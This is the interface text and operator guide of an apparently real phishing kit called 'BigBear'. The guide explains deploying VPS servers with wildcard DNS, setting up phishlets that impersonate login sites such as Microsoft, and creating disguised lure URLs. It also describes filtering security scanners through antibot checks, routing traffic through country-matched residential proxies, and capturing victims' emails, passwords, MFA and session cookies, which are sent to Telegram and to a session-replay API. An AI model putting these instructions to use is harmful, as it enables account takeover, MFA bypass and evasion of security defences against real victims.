No VPS selected

VPS Management

Manage your VPS servers and installations

NameIP AddressDomainStatusActions

DNS Challenges & SSL

Generate ACME DNS challenges and SSL certificates

Active Installations

View all active installations with web panel access

Loading installations...

Credentials

Permanently stored captures from all your VPS instances

0
Total
0
Complete
0
With Password
0
With Cookies
Email Password Stage Country Browser VPS Keepalive Captured Actions
0 records
Per page:

Admin Panel

Manage users and view all VPS

User Management

IDUsernameRoleStatusCreatedActions

All VPS (All Users)

IDNameIPDomainStatusUserActions

BigBear Control

Start, stop, restart, and monitor BigBear instances

Control Actions

BigBear Logs


                    

Configuration

Manage BigBear configuration settings

Quick Guide

  • Domain: Root domain your server listens on
  • External IPv4: Public IP of your VPS
  • Unauthorized URL: Redirect for invalid lure visits
  • Webhook Verbosity: 0=off, 1=final auth, 2=all
Select a VPS from the dropdown at the top to manage its configuration.

Phishlets

Manage your phishing templates

Quick Guide

  • Enable: Activates the phishlet and generates SSL
  • Disable: Stops the phishlet
  • Hide/Unhide: Returns 404 unless valid Lure ID present
  • Subdomain: The subdomain prefix for this phishlet (e.g. login → login.example.com)
  • Redirect URL: Where blocked/unauthorized visitors are sent
Select a VPS from the dropdown at the top to manage its phishlets.
NameStatusDomainSubdomainRedirect URLActions

Lures

Manage your phishing lures

How Lures Work

  • Lure URL: The entry point you share with targets. Antibot checks run here first.
  • Domain URL: Base domain. Antibot active — no session created without lure path.
  • Success Redirect: Where victim goes after authentication completes (leave blank for real site).
  • Bot Redirect: Where blocked visitors (bots/scanners) are sent.
Select a VPS from the dropdown at the top to manage its lures.
IDPhishletLure URLSuccess RedirectBot RedirectStatusActions

Live Sessions

Real-time session tracking with live stage progression

Select a VPS from the dropdown at the top to view live sessions.
0
Total
0
Visitors
0
Email
0
Password/MFA
0
Complete
IDPhishletStageEmailPasswordIPCountryTokensUpdatedActions

Proxy Configuration

Geo-adaptive proxy routing for upstream connections

How Proxy Pool Works

  • Geo-Matching: Visitor country is detected via IP intel. If a proxy with a matching country exists, it is used automatically.
  • Fallback: If no country match, the first available enabled proxy is used.
  • Sync: Click "Sync Pool to VPS" to push your proxy pool from this panel to the VPS config.
Select a VPS from the dropdown at the top.

Proxy Pool (0 proxies)

NameCountryAddressPortTypeEnabled
Legacy Single Proxy (optional fallback)

Blacklist

Manage automatic IP blacklisting

Blacklist Modes

  • Off: Ignore blacklist
  • Unauth: Block only unauthorized requests
  • All: Block all requests from blacklisted IPs
  • NoAdd: Block existing, don't add new IPs
Select a VPS from the dropdown at the top.

Current mode: -

Cookie API Configuration

Forward captured cookies to your local Python API for automated session replay

Quick Guide: Cookie Forwarding

  • Enabled: When on, captured cookies are automatically sent to your Python API as JavaScript jobs
  • API URL: Endpoint that receives the JSON data (e.g., http://localhost:5000/api/jobs)
  • Auto Start: Immediately process the session when created
  • Proxy: Optional proxy settings if your API needs external access
Select a VPS from the dropdown at the top.

Proxy Configuration (Optional)

Engine Logs

Live log stream from the BigBear engine on the target VPS

Select a VPS from the dropdown at the top to view engine logs.
Logs will appear here when streaming is started...

Help & Guide

Step-by-step instructions for every feature

Quick Start (5 Steps)

Get a phishing page live in under 10 minutes:

  1. Buy a domain (e.g. example.com) and a fresh Ubuntu VPS.
  2. Point DNS — Add two A records at your registrar:
    A   example.com       → VPS_IP
    A   *.example.com    → VPS_IP
  3. Add VPS in this panel — Enter the IP, SSH credentials, domain, and Telegram webhook.
  4. Click Install — The panel uploads the engine, configures everything, obtains SSL certificates automatically, and starts the engine.
  5. Create a Lure — Go to Lures, create one with path /meetings. Your lure URL is ready to send.

VPS Management

This is your starting point. Add your target VPS servers here, and the panel will connect to them over SSH to manage everything remotely.

Adding a VPS

  1. Click + Add VPS and fill in the Name, IP, SSH port (usually 22), username (root), and password.
  2. Set the Domain you will use (e.g. example.com). DNS must already point to the VPS IP.
  3. BigBear Path is where the engine gets installed (default: /root/bigbear).
  4. Telegram Webhook sends real-time alerts. Format: BOT_TOKEN/CHAT_ID (see Telegram section below).

VPS Actions

  • Install: Runs the full automated setup on a fresh VPS (uploads engine, configures firewall, obtains SSL, starts service).
  • Edit: Update IP, credentials, domain, or Telegram webhook.
  • Delete: Removes the VPS from the panel. Does not touch the remote server.

Installation Process

When you click Install on a VPS, the panel runs a fully automated setup:

  1. Upload — Transfers bigbear2.zip to the VPS containing the engine binary, phishlets, and proxy.json.
  2. Extract — Unpacks the engine files to the BigBear path.
  3. Firewall — Opens ports 443, 80, 53, and 7654. Frees port 53 from systemd-resolved.
  4. Configuration — Writes config.json with your domain, IP, and Telegram settings.
  5. Systemd Service — Creates and enables bigbear-engine.service for automatic startup.
  6. Start Engine — Launches the engine. SSL certificates are obtained automatically via Let's Encrypt.
No manual SSL setup needed. The engine uses Let's Encrypt HTTP-01 challenge to automatically obtain and renew SSL certificates for every subdomain defined in your phishlet.

DNS Setup

Before installing BigBear on a VPS, you must configure DNS at your domain registrar.

Required DNS Records

Add these two A records at your registrar (e.g. Namecheap, Cloudflare, GoDaddy):

TypeNameValue
A@Your VPS IP
A*Your VPS IP
Important: The wildcard record (*) is essential. The engine uses multiple subdomains (management, cdn, login, device, etc.) and they all must resolve to your VPS IP. Wait for DNS propagation (usually 5-30 minutes) before installing.

BigBear Control

Start, stop, restart, and monitor BigBear engine instances on your VPS servers.

  • Start: Starts the BigBear engine via systemd. The engine binds to ports 443, 80, 53, and 7654.
  • Stop: Stops the engine cleanly and releases all ports.
  • Restart: Stops, waits for ports to release, then starts again. Use this after configuration changes.
  • Logs: View real-time engine logs (visitors, credentials, antibot decisions, proxy routing).

Configuration

Edit the engine configuration on the selected VPS. Changes are saved to config.json and hot-reloaded automatically.

  • Domain: The base domain for your phishing setup (e.g. example.com). Cannot be changed after installation without reinstalling.
  • External IP: Your VPS's public IP. Must match your DNS A records exactly.
  • Redirect URL: Where blocked visitors (bots, VPNs, datacenter IPs) get redirected. Default: https://www.google.com
  • IPAPI Key: API key from ipapi.is for IP intelligence (antibot checks). Required for the antibot to work.
  • Telegram: Bot token and chat ID for real-time notifications.

Phishlets

Phishlets are YAML files that define how the engine impersonates a target website. They control domain mapping, URL rewriting, JavaScript injection, cookie capture, and credential interception.

Key Fields

  • Subdomain: The landing subdomain (the one with is_landing: true). This is used in your lure URLs. You can change it from this panel.
  • Domain: Auto-filled from your VPS configuration.
  • Enabled/Disabled: Toggle the phishlet on or off.
Changing the subdomain only modifies the landing host's phish_sub. Other proxy hosts (cdn, device, login, etc.) keep their original subdomains. After changing, restart the engine for the new subdomain to take effect.

Lures

Lures are the phishing URLs you send to targets. Each lure has a custom path and is tied to a phishlet.

How Lures Work

  1. Create a lure and set a path (e.g. /meetings).
  2. Your lure URL becomes: https://management.example.com/meetings
  3. When a visitor opens this URL, the engine runs the antibot check (ipapi.is).
  4. If the visitor passes (residential IP), the engine creates a session, whitelists their IP, and redirects them to the login page.
  5. If blocked (datacenter/VPN/proxy IP), the visitor is redirected to the redirect URL (default: google.com).

Lure Fields

PathCustom URL path. Use something that looks legitimate (e.g. /meetings, /document/view, /portal).
OG Title / Desc / ImageOpen Graph tags for link previews when shared on social media or messaging apps.
UA FilterRegex to only allow specific user agents (leave empty to allow all).
PausedTemporarily disables the lure without deleting it.

Live Sessions

The Sessions section shows all active and completed phishing sessions in real-time.

Session Stages

VisitorTarget opened the lure URL and was redirected to the login page.
Email EnteredTarget typed their email address.
Password EnteredTarget submitted their password. May show retry count if they re-entered it.
MFA PendingWaiting for the target to complete MFA (authenticator app, SMS code, etc.).
CompleteFull session captured: email, password, and all authentication cookies. The cookie.js file is sent to Telegram.

Geo-Proxy Routing

The engine automatically routes all traffic to the target site (e.g. Microsoft) through residential proxies matching the visitor's country.

How It Works

  1. When a visitor arrives, the antibot detects their country via ipapi.is (e.g. "Austria").
  2. All requests from that visitor to the target site are routed through the AT (Austria) proxy from proxy.json.
  3. Microsoft sees traffic coming from a residential Austrian IP instead of your VPS datacenter IP.

Fallback Chain

  1. Exact country proxy — Matches the visitor's country code.
  2. UK (GB) proxy — If the country proxy fails or is unavailable.
  3. Direct VPS IP — Last resort if all proxies fail.
The engine ships with 69 country-specific proxies in proxy.json. They are automatically deployed to every new VPS during installation.

Antibot & IP Intelligence

Every visitor hitting a lure URL is checked in real-time via ipapi.is before they can see the login page.

What Gets Checked

  • IP Blacklist: IPs manually added to blacklist.txt are blocked immediately.
  • Bot User Agents: Known bot/scanner user agents are blocked.
  • IP Intelligence (ipapi.is): Every request is checked synchronously. Datacenter, VPN, and proxy IPs are blocked. Only residential IPs pass through.

What Happens When Blocked

Blocked visitors are redirected to the Redirect URL (configured in Configuration section, default: google.com). They never see the phishing page.

Telegram Notifications

Get real-time alerts when visitors arrive, enter credentials, or complete authentication.

Step 1: Create a Telegram Bot

  1. Open Telegram and search for @BotFather.
  2. Send the command /newbot.
  3. Choose a name for your bot (e.g. "My Alerts").
  4. Choose a username (e.g. myalerts_bot).
  5. BotFather will reply with your Bot Token. It looks like:
    7842901234:AAF_abcdef123456789xyz
  6. Save this token.

Step 2: Get Your Chat ID

  1. Open Telegram and search for @userinfobot (or @getmyid_bot).
  2. Send /start to the bot.
  3. It will reply with your Chat ID (a number like 123456789).

For group chats: Add your bot to the group, send a message, then visit https://api.telegram.org/bot<TOKEN>/getUpdates and find the chat ID (it will be a negative number like -100xxxxxxxxxx).

Step 3: Enter in the Panel

When adding or editing a VPS, paste into the Telegram Webhook field using this format:

BOT_TOKEN/CHAT_ID

Example:
7842901234:AAF_abcdef123456789xyz/123456789

Notification Events

New VisitorIP, Country, ISP, User Agent, Phishlet
CredentialsEmail, Password, IP, Country, ISP, User Agent, Phishlet
Session CompleteEmail, Password, IP, Country, ISP, UA, Token count + cookie.js file attachment

Troubleshooting

Lure redirects to GoogleThe lure is not registered. Create one in the Lures section and restart the engine.
Port already in useStop the engine, wait 5 seconds, then start again. Use the Restart button.
SSL certificate errorCertificates are issued automatically. Wait 30 seconds after startup and try again. Check Engine Logs for errors.
Antibot blocks my IPYou are using a VPN or datacenter connection. Test from a residential internet connection (home WiFi, mobile data).
No Telegram notificationsVerify your bot token and chat ID. Make sure the webhook format is correct: BOT_TOKEN/CHAT_ID
Subdomain not loadingCheck that your wildcard DNS record (*.example.com) points to the VPS IP. All subdomains must resolve.
404 page after loginThe phishlet's login URL may be misconfigured. Check Engine Logs for proxy errors.
Engine keeps restartingAnother process is holding the ports. Stop the engine, run pkill -9 bigbear-engine via SSH, wait 5 seconds, then start.